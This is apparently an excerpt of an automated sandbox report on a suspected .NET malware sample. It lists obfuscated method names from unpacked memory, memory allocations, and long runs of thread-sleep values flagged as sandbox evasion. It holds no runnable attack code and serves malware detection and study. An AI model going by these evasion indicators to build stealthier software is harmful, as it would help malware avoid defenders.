                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, V8xnZkzbloQN1oqh1t.cs | High entropy of concatenated method names: 'l64ECM7i5f', 'vMgE6Qs4K9', 'NfREjsLPDb', 'CoOEvpk32s', 'fw6E2QrwDK', 'Kv7EFbAETD', 'CghE7r57bQ', 'JOfEJKBimh', 'ynoEw922Df', 'H1fEcKBFLt'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, NfMc5VP5elSuT97t75.cs | High entropy of concatenated method names: 'ywgtm0kyQ7', 'J0gtZLJmEl', 'wB0trIwCvH', 'Hv3rB5sHPi', 'zERrzH82EX', 'PH5tHjs5e4', 'qlCtABQigZ', 'jNttUNyCBd', 'DartqGM4CJ', 'rVGtSpR4FS'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, tTG5u66bvje53TXubH.cs | High entropy of concatenated method names: 'p2wGevn2IC', 'PEyGgFPhUj', 'noYGN2YKnI', 'wRsGLlXtCJ', 'UpTGVbCwn6', 'prAGKP8mxo', 'mpaGDmvV4A', 'HbYGOxLmQK', 'r20G0Hx9nQ', 'rMkGBGTnbC'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, Tb71NqASyY2jsVR0Wv5.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vSvTxKdyTK', 'DkdTEO5dMK', 'e9PTuDUXMK', 'yo3TTY05ak', 'sblTlIw1DY', 'RTUThjZcAc', 'EqZTJUADcD'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, z1kK0NZZgC0XJYbnPZ.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wSfU0qnPU3', 'a2LUBufKZ5', 'GZgUzdnWQX', 'lB5qH1hQed', 'RSuqAqwrGI', 'hxHqUJm9fW', 'tWGqq5vNFG', 'wLsMBHI2DY8iqSi3Buk'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, UtVPfr1lW3qEpb6TPt.cs | High entropy of concatenated method names: 'Mxg3dTGPfS', 'vSZ3RmJuOL', 'abTZaT5Z0V', 'cUSZFmWnmM', 'dkhZ7gQv3v', 'YYWZsFtv4L', 'g4bZPwtCKb', 'mrLZ8HZ2Mr', 'lyhZYA6rK9', 'oKTZWAcqw5'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, fLgG2NjKayBElw7pF6.cs | High entropy of concatenated method names: 'RlrZXGgiMF', 'mThZCUl661', 'uOxZ6NHIu7', 'lTTZj5IPvr', 'qQuZpwacEf', 'lJZZMgW2yf', 'qRsZIthEDI', 'OH4ZynHUJC', 'C5kZxQnj6I', 'Yi5ZEgi6B9'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, crEQIxYD98kSnOTwPV.cs | High entropy of concatenated method names: 'TO2twh0JGE', 'T6Ctca075y', 'cTgtoxsrYx', 'DH5tXVBQAT', 'UmJtdppDIJ', 'ILotCTGAQr', 'moxtRe3Z64', 'iCnt6hgUp5', 'QaotjSbI6b', 'c0ht1ydm1r'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, F53hZuviP6sCr447Mm.cs | High entropy of concatenated method names: 'KEvriw4YLk', 'xworGQWiJZ', 'T2Vr3YJsFR', 'kQ5rtOwQt9', 'uEJrkqeUoK', 'vs33VBKa0i', 'GDj3K8j11S', 'N7p3DZt0k6', 'A6Q3OidgCv', 'RhE30C0kaO'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, YRPcnen60xXs813G8l.cs | High entropy of concatenated method names: 'rXUQ6nXKG5', 'o3bQjI0K0s', 'EgWQvGRelX', 'tCDQ2nIL1E', 'f9vQFOSrZR', 'v78Q7X7vC7', 'V1EQPA0gKT', 'Un6Q8ncQPO', 'nPoQWltmyo', 'HjLQ5tQ38R'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, c3OKGSsH3otOS2iZPy.cs | High entropy of concatenated method names: 'o6VrNENlJ4', 'Q8YrLgeQJ1', 'U5HrVLtD5f', 'ToString', 'sbErKsfwCB', 'LI9rDoX0G9', 'zTUup72sviCdiyyLt13', 'FUtfm32cbF2lTHWlru6', 'Caugw42roSoAHUGl8RK'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, zooLG2D1NETVSuCcGH.cs | High entropy of concatenated method names: 'NmBxp3Z0XL', 't8DxIpn2mh', 'WyIxxXTt00', 'MO2xub3UL4', 'MoLxlTmpNS', 'VU9xJSnkoA', 'Dispose', 'ahaymnqgb9', 'KCdyGR9Yx0', 'o3UyZ4WhQP'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, ICRvmKAAcQHSY8gbpCE.cs | High entropy of concatenated method names: 'fxDEBNEmfY', 'V8rEzmSQJb', 'z6TuHnmarc', 'AsNuAELGqW', 'HJ8uU3XidO', 'lQjuqmVjNL', 'oUauSHHeJI', 'kxJuixIMhs', 'W4RumGPMLR', 'nlRuGi3uVq'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, EAvKHf0VSryQELm8rN.cs | High entropy of concatenated method names: 'CsKxv3mfhl', 'tSlx2NwHsv', 'FSvxaej5dr', 'IdLxFSTCxY', 'P4Nx7WsrIT', 'o0uxsg2S17', 'jlFxPJQuxO', 'fNYx8lRm21', 'nrLxY8KaQd', 'S17xW7yZdl'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | High entropy of concatenated method names: 'ASyqiEJqv8', 'jLLqmLRRLq', 'eoqqGH0dfl', 'D5LqZ2asyY', 'OWlq308cG8', 'KtxqrkJG6P', 'ipjqtclgob', 'Gwlqk4ldK5', 'OuIqfyChLB', 'VWcqbKh7qb'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, roFcEIUNPNfMFQtdu2.cs | High entropy of concatenated method names: 'W7koJii1S', 'jBrXD5D3n', 'orICbc1el', 'BUiRYZ8uP', 'x5wjuZfij', 'KpY1Dy5Uu', 'EkCXH3CsfGtlPSEVZq', 'oehIs5ETGHMae6MyIh', 'M8ryy3f92', 'KJfEQHQRx'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, asLAXfB6W5Ixa3Snel.cs | High entropy of concatenated method names: 'Q1LEZWIhqj', 'UQjE3CaSuy', 'PpREr8tbA9', 'fNyEtYGPcm', 'A60ExVr2TN', 'vBbEk4j7JB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, PF5f0TGGGJmOPQqetg.cs | High entropy of concatenated method names: 'Dispose', 'sTVA0SuCcG', 'hLUU2rr41q', 'tvf7ZSMsuy', 'aIsABqeWKS', 'rXGAzjjd4i', 'ProcessDialogKey', 'S0jUHAvKHf', 'USrUAyQELm', 'LrNUUHsLAX'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, JDtUwoKuo75hSEnrug.cs | High entropy of concatenated method names: 'zieIOyTmVX', 'neNIBHvGtA', 'WT4yHXOisT', 'LOZyAkW50S', 'i0HI5S6tL7', 'evMI94QQVq', 'J8mInvUgUe', 'g3bIeMLaCt', 'gNYIg3QxNS', 'L3nINk91aF'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, noelrBAUQk7dBQSl2gY.cs | High entropy of concatenated method names: 'ToString', 'yMku6Yx4sf', 'Fn0ujM30Ao', 'rp4u1xikvR', 'ovNuvm8hDI', 'W1Gu2g8Zoj', 'iiOuafafRl', 'F5luFaDyQI', 'i45n7CbQqXd0JUVyU4x', 'Jrl2H9bMeEs8tNgWaHe'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, oumZYrSQJH8HN76im8.cs | High entropy of concatenated method names: 'fcuAtTG5u6', 'mvjAke53TX', 'SKaAbyBElw', 'JpFA46VtVP', 'm6TApPt153', 'wZuAMiP6sC', 'KVsaFdZLLG2DyGvymS', 'T2EfIf56drpwg4ZcKh', 'PP9AAQqBfB', 'fwSAq7cR1V'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, qPh7KmAHne0atqquLNL.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dR9E5BphVr', 'w5eE9092oh', 'K4iEntiWp5', 'rJUEeD9wbJ', 'Kr6Eget2dA', 'lqOENqoXhD', 'VdIEL8V7LJ'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, rYESTdeEVhin7mQVke.cs | High entropy of concatenated method names: 'WGWpWruvCG', 'Gmmp9WLpPI', 'nB7peYu14W', 'wEypgJcaLU', 'Dd1p2iJkmL', 'osApaxsqEe', 'OWupFHJZq4', 'MwRp7SQ2dH', 'Q8HpsCWIwJ', 'rRhpPOgTi1'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, YsRmyuNdGdZhXTNigh.cs | High entropy of concatenated method names: 'ToString', 'f17M5g9frc', 'wkTM2cajBi', 'CgjMayeyr2', 'IDYMFBUNJf', 'kKVM7TuWNI', 'kajMsDQhtu', 'qB4MPoPFYd', 'y7wM8Eq2Dj', 'tWKMYd4Xf6'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, V8xnZkzbloQN1oqh1t.cs | High entropy of concatenated method names: 'l64ECM7i5f', 'vMgE6Qs4K9', 'NfREjsLPDb', 'CoOEvpk32s', 'fw6E2QrwDK', 'Kv7EFbAETD', 'CghE7r57bQ', 'JOfEJKBimh', 'ynoEw922Df', 'H1fEcKBFLt'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, NfMc5VP5elSuT97t75.cs | High entropy of concatenated method names: 'ywgtm0kyQ7', 'J0gtZLJmEl', 'wB0trIwCvH', 'Hv3rB5sHPi', 'zERrzH82EX', 'PH5tHjs5e4', 'qlCtABQigZ', 'jNttUNyCBd', 'DartqGM4CJ', 'rVGtSpR4FS'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, tTG5u66bvje53TXubH.cs | High entropy of concatenated method names: 'p2wGevn2IC', 'PEyGgFPhUj', 'noYGN2YKnI', 'wRsGLlXtCJ', 'UpTGVbCwn6', 'prAGKP8mxo', 'mpaGDmvV4A', 'HbYGOxLmQK', 'r20G0Hx9nQ', 'rMkGBGTnbC'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, Tb71NqASyY2jsVR0Wv5.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vSvTxKdyTK', 'DkdTEO5dMK', 'e9PTuDUXMK', 'yo3TTY05ak', 'sblTlIw1DY', 'RTUThjZcAc', 'EqZTJUADcD'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, z1kK0NZZgC0XJYbnPZ.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wSfU0qnPU3', 'a2LUBufKZ5', 'GZgUzdnWQX', 'lB5qH1hQed', 'RSuqAqwrGI', 'hxHqUJm9fW', 'tWGqq5vNFG', 'wLsMBHI2DY8iqSi3Buk'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, UtVPfr1lW3qEpb6TPt.cs | High entropy of concatenated method names: 'Mxg3dTGPfS', 'vSZ3RmJuOL', 'abTZaT5Z0V', 'cUSZFmWnmM', 'dkhZ7gQv3v', 'YYWZsFtv4L', 'g4bZPwtCKb', 'mrLZ8HZ2Mr', 'lyhZYA6rK9', 'oKTZWAcqw5'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, fLgG2NjKayBElw7pF6.cs | High entropy of concatenated method names: 'RlrZXGgiMF', 'mThZCUl661', 'uOxZ6NHIu7', 'lTTZj5IPvr', 'qQuZpwacEf', 'lJZZMgW2yf', 'qRsZIthEDI', 'OH4ZynHUJC', 'C5kZxQnj6I', 'Yi5ZEgi6B9'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, crEQIxYD98kSnOTwPV.cs | High entropy of concatenated method names: 'TO2twh0JGE', 'T6Ctca075y', 'cTgtoxsrYx', 'DH5tXVBQAT', 'UmJtdppDIJ', 'ILotCTGAQr', 'moxtRe3Z64', 'iCnt6hgUp5', 'QaotjSbI6b', 'c0ht1ydm1r'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, F53hZuviP6sCr447Mm.cs | High entropy of concatenated method names: 'KEvriw4YLk', 'xworGQWiJZ', 'T2Vr3YJsFR', 'kQ5rtOwQt9', 'uEJrkqeUoK', 'vs33VBKa0i', 'GDj3K8j11S', 'N7p3DZt0k6', 'A6Q3OidgCv', 'RhE30C0kaO'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, YRPcnen60xXs813G8l.cs | High entropy of concatenated method names: 'rXUQ6nXKG5', 'o3bQjI0K0s', 'EgWQvGRelX', 'tCDQ2nIL1E', 'f9vQFOSrZR', 'v78Q7X7vC7', 'V1EQPA0gKT', 'Un6Q8ncQPO', 'nPoQWltmyo', 'HjLQ5tQ38R'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, c3OKGSsH3otOS2iZPy.cs | High entropy of concatenated method names: 'o6VrNENlJ4', 'Q8YrLgeQJ1', 'U5HrVLtD5f', 'ToString', 'sbErKsfwCB', 'LI9rDoX0G9', 'zTUup72sviCdiyyLt13', 'FUtfm32cbF2lTHWlru6', 'Caugw42roSoAHUGl8RK'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, zooLG2D1NETVSuCcGH.cs | High entropy of concatenated method names: 'NmBxp3Z0XL', 't8DxIpn2mh', 'WyIxxXTt00', 'MO2xub3UL4', 'MoLxlTmpNS', 'VU9xJSnkoA', 'Dispose', 'ahaymnqgb9', 'KCdyGR9Yx0', 'o3UyZ4WhQP'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, ICRvmKAAcQHSY8gbpCE.cs | High entropy of concatenated method names: 'fxDEBNEmfY', 'V8rEzmSQJb', 'z6TuHnmarc', 'AsNuAELGqW', 'HJ8uU3XidO', 'lQjuqmVjNL', 'oUauSHHeJI', 'kxJuixIMhs', 'W4RumGPMLR', 'nlRuGi3uVq'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, EAvKHf0VSryQELm8rN.cs | High entropy of concatenated method names: 'CsKxv3mfhl', 'tSlx2NwHsv', 'FSvxaej5dr', 'IdLxFSTCxY', 'P4Nx7WsrIT', 'o0uxsg2S17', 'jlFxPJQuxO', 'fNYx8lRm21', 'nrLxY8KaQd', 'S17xW7yZdl'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.cs | High entropy of concatenated method names: 'ASyqiEJqv8', 'jLLqmLRRLq', 'eoqqGH0dfl', 'D5LqZ2asyY', 'OWlq308cG8', 'KtxqrkJG6P', 'ipjqtclgob', 'Gwlqk4ldK5', 'OuIqfyChLB', 'VWcqbKh7qb'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, roFcEIUNPNfMFQtdu2.cs | High entropy of concatenated method names: 'W7koJii1S', 'jBrXD5D3n', 'orICbc1el', 'BUiRYZ8uP', 'x5wjuZfij', 'KpY1Dy5Uu', 'EkCXH3CsfGtlPSEVZq', 'oehIs5ETGHMae6MyIh', 'M8ryy3f92', 'KJfEQHQRx'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, asLAXfB6W5Ixa3Snel.cs | High entropy of concatenated method names: 'Q1LEZWIhqj', 'UQjE3CaSuy', 'PpREr8tbA9', 'fNyEtYGPcm', 'A60ExVr2TN', 'vBbEk4j7JB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, PF5f0TGGGJmOPQqetg.cs | High entropy of concatenated method names: 'Dispose', 'sTVA0SuCcG', 'hLUU2rr41q', 'tvf7ZSMsuy', 'aIsABqeWKS', 'rXGAzjjd4i', 'ProcessDialogKey', 'S0jUHAvKHf', 'USrUAyQELm', 'LrNUUHsLAX'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, JDtUwoKuo75hSEnrug.cs | High entropy of concatenated method names: 'zieIOyTmVX', 'neNIBHvGtA', 'WT4yHXOisT', 'LOZyAkW50S', 'i0HI5S6tL7', 'evMI94QQVq', 'J8mInvUgUe', 'g3bIeMLaCt', 'gNYIg3QxNS', 'L3nINk91aF'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, noelrBAUQk7dBQSl2gY.cs | High entropy of concatenated method names: 'ToString', 'yMku6Yx4sf', 'Fn0ujM30Ao', 'rp4u1xikvR', 'ovNuvm8hDI', 'W1Gu2g8Zoj', 'iiOuafafRl', 'F5luFaDyQI', 'i45n7CbQqXd0JUVyU4x', 'Jrl2H9bMeEs8tNgWaHe'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, oumZYrSQJH8HN76im8.cs | High entropy of concatenated method names: 'fcuAtTG5u6', 'mvjAke53TX', 'SKaAbyBElw', 'JpFA46VtVP', 'm6TApPt153', 'wZuAMiP6sC', 'KVsaFdZLLG2DyGvymS', 'T2EfIf56drpwg4ZcKh', 'PP9AAQqBfB', 'fwSAq7cR1V'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, qPh7KmAHne0atqquLNL.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dR9E5BphVr', 'w5eE9092oh', 'K4iEntiWp5', 'rJUEeD9wbJ', 'Kr6Eget2dA', 'lqOENqoXhD', 'VdIEL8V7LJ'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, rYESTdeEVhin7mQVke.cs | High entropy of concatenated method names: 'WGWpWruvCG', 'Gmmp9WLpPI', 'nB7peYu14W', 'wEypgJcaLU', 'Dd1p2iJkmL', 'osApaxsqEe', 'OWupFHJZq4', 'MwRp7SQ2dH', 'Q8HpsCWIwJ', 'rRhpPOgTi1'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, YsRmyuNdGdZhXTNigh.cs | High entropy of concatenated method names: 'ToString', 'f17M5g9frc', 'wkTM2cajBi', 'CgjMayeyr2', 'IDYMFBUNJf', 'kKVM7TuWNI', 'kajMsDQhtu', 'qB4MPoPFYd', 'y7wM8Eq2Dj', 'tWKMYd4Xf6'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, V8xnZkzbloQN1oqh1t.cs | High entropy of concatenated method names: 'l64ECM7i5f', 'vMgE6Qs4K9', 'NfREjsLPDb', 'CoOEvpk32s', 'fw6E2QrwDK', 'Kv7EFbAETD', 'CghE7r57bQ', 'JOfEJKBimh', 'ynoEw922Df', 'H1fEcKBFLt'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, NfMc5VP5elSuT97t75.cs | High entropy of concatenated method names: 'ywgtm0kyQ7', 'J0gtZLJmEl', 'wB0trIwCvH', 'Hv3rB5sHPi', 'zERrzH82EX', 'PH5tHjs5e4', 'qlCtABQigZ', 'jNttUNyCBd', 'DartqGM4CJ', 'rVGtSpR4FS'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, tTG5u66bvje53TXubH.cs | High entropy of concatenated method names: 'p2wGevn2IC', 'PEyGgFPhUj', 'noYGN2YKnI', 'wRsGLlXtCJ', 'UpTGVbCwn6', 'prAGKP8mxo', 'mpaGDmvV4A', 'HbYGOxLmQK', 'r20G0Hx9nQ', 'rMkGBGTnbC'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, Tb71NqASyY2jsVR0Wv5.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vSvTxKdyTK', 'DkdTEO5dMK', 'e9PTuDUXMK', 'yo3TTY05ak', 'sblTlIw1DY', 'RTUThjZcAc', 'EqZTJUADcD'
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: UFOiZapHGS.exe PID: 6596, type: MEMORYSTR
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: DC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 2760000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 2590000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 87B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 97B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 99B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: A9B0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: B000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: C000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: D000000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 1290000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 2D40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Memory allocated: 4D40000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 600000
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599875
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599766
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599641
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599531
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599422
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599312
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599203
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 599094
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598984
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598865
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598750
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598640
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598531
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598422
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598312
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598203
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 598094
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597984
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597874
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597765
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597656
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597546
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597437
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597328
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597219
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 597098
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596983
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596872
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596757
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596643
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596516
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596405
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596297
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596187
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 596078
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595969
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595859
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595750
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595641
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595531
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595422
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595313
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595188
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 595063
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 594938
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 594828
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 594718
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 594609
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Thread delayed: delay time: 594500
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Window / User API: threadDelayed 1869
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe | Window / User API: threadDelayed 7983
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 6640 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep count: 37 > 30
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -34126476536362649s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7016 | Thread sleep count: 1869 > 30
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599875s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7016 | Thread sleep count: 7983 > 30
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599766s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599641s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599531s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599422s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599312s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599203s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -599094s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598984s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598865s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598750s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598640s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598531s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598422s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598312s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598203s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -598094s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597984s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597874s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597765s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597656s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597546s >= -30000s
                Source: C:\Users\user\Desktop\UFOiZapHGS.exe TID: 7024 | Thread sleep time: -597437s >= -30000s
